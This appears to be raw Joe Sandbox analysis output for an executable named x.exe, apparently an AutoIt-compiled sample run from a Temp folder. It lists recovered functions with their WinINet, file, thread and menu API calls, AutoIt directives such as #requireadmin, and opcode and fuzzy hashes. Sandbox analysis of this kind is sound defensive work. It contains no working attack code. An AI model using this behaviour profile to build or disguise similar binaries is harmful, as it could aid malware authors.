                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                                                                    • String ID: H
                                                                                                                                                    • API String ID: 3613100350-2852464175
                                                                                                                                                    • Opcode ID: 5eaced02bd808bb80e8832f800070633c5db503b85e11b56c521c17bfe1438c7
                                                                                                                                                    • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                                                                    • Opcode Fuzzy Hash: 5eaced02bd808bb80e8832f800070633c5db503b85e11b56c521c17bfe1438c7
                                                                                                                                                    • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                                                                    Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1291720006-3916222277
                                                                                                                                                    • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                                                    • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                                                                    • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                                                    • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                                                                    Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                                                    • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                    • String ID: 0$2
                                                                                                                                                    • API String ID: 93392585-3793063076
                                                                                                                                                    • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                    • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                                                    • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                    • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                                                    Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                                                                    • String ID: crts
                                                                                                                                                    • API String ID: 586820018-3724388283
                                                                                                                                                    • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                                    • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                                                                    • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                                    • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                                                                    Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\x.exe,0040F545,C:\Users\user\AppData\Local\Temp\x.exe,004A90E8,C:\Users\user\AppData\Local\Temp\x.exe,?,0040F545), ref: 0041013C
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                                                                    • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                                                                    • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                                                                    • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                                                    • String ID: \*.*
                                                                                                                                                    • API String ID: 2326526234-1173974218
                                                                                                                                                    • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                                    • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                                                                    • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                                    • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                                                                    Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                                                                    • _wcslen.LIBCMT ref: 004335F2
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0043362B
                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                                                                    • _wcsrchr.LIBCMT ref: 00433666
                                                                                                                                                      • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                                    • String ID: \
                                                                                                                                                    • API String ID: 321622961-2967466578
                                                                                                                                                    • Opcode ID: 3116705ccae5b035fb050d3d24a4b0e96dbfb2baa543bedfe79533bbc9dedcaa
                                                                                                                                                    • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                                                                    • Opcode Fuzzy Hash: 3116705ccae5b035fb050d3d24a4b0e96dbfb2baa543bedfe79533bbc9dedcaa
                                                                                                                                                    • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                                                                    Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                    • API String ID: 1038674560-2734436370
                                                                                                                                                    • Opcode ID: bbd0115777c328fe2b5b97631fd4b032eb1a1adf87e6235e777947e3b4874035
                                                                                                                                                    • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                                                                    • Opcode Fuzzy Hash: bbd0115777c328fe2b5b97631fd4b032eb1a1adf87e6235e777947e3b4874035
                                                                                                                                                    • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                                                                                    Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                                                                    • __lock.LIBCMT ref: 00417981
                                                                                                                                                      • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                                                                      • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                                                                      • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                                                    • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                                                    • __lock.LIBCMT ref: 004179A2
                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                    • String ID: KERNEL32.DLL$pI
                                                                                                                                                    • API String ID: 637971194-197072765
                                                                                                                                                    • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                    • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                                                    • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                    • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                                                                    Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$_malloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1938898002-0
                                                                                                                                                    • Opcode ID: 47ae332b0c3fdd5c6a5b7ee933624023be2332cac83d4d1564717d643a2c9bf0
                                                                                                                                                    • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                                                                    • Opcode Fuzzy Hash: 47ae332b0c3fdd5c6a5b7ee933624023be2332cac83d4d1564717d643a2c9bf0
                                                                                                                                                    • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                                                                    Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                                                    • _memmove.LIBCMT ref: 0044B555
                                                                                                                                                    • _memmove.LIBCMT ref: 0044B578
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2737351978-0
                                                                                                                                                    • Opcode ID: 3da59599e3517c56d786d29cdd3be2166197c4aaac83666dce2fd8ac34c2c006
                                                                                                                                                    • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                                                                    • Opcode Fuzzy Hash: 3da59599e3517c56d786d29cdd3be2166197c4aaac83666dce2fd8ac34c2c006
                                                                                                                                                    • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                                                                    Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 00415246
                                                                                                                                                    • __getptd.LIBCMT ref: 00415253
                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                                                                    • _free.LIBCMT ref: 0041529E
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3638380555-0
                                                                                                                                                    • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                                                                                                    • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                                                                    • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                                                                                                    • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                                                                    Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
